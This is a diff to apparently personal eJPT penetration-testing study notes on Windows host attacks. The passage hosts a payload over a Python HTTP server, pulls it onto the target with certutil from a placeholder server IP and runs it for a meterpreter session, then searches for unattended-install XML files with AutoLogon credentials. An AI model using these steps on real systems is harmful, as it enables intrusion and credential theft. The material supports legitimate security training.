jtr0000/eJPT-Notes/6 - System_Host Based Attacks/System_Host Based Attacks.md

 python -m SimpleHTTPServer 80
 ```

-You can use the `certutil` command on the windows system to download the payload.
+If we already have access to the system, we can use the `certutil` command on the target windows system to download the payload and then execute it.
 ```
 certutil -urlcache -f http://<server_ip>/payload.exe payload.exe
 ```

+After the payload runs, the meterpreter session should start.
 Use could try to use meterpreter's in-built search to search for the type of files you're interested in.

 ```
-search -f <file>.txt
+search -f <file>.xml
 ```

 Look for `<AutoLogon>` tag, this should have hard-coded credentials.
 We'd know any password is encoded if the `<PlainText>` tag is set to false.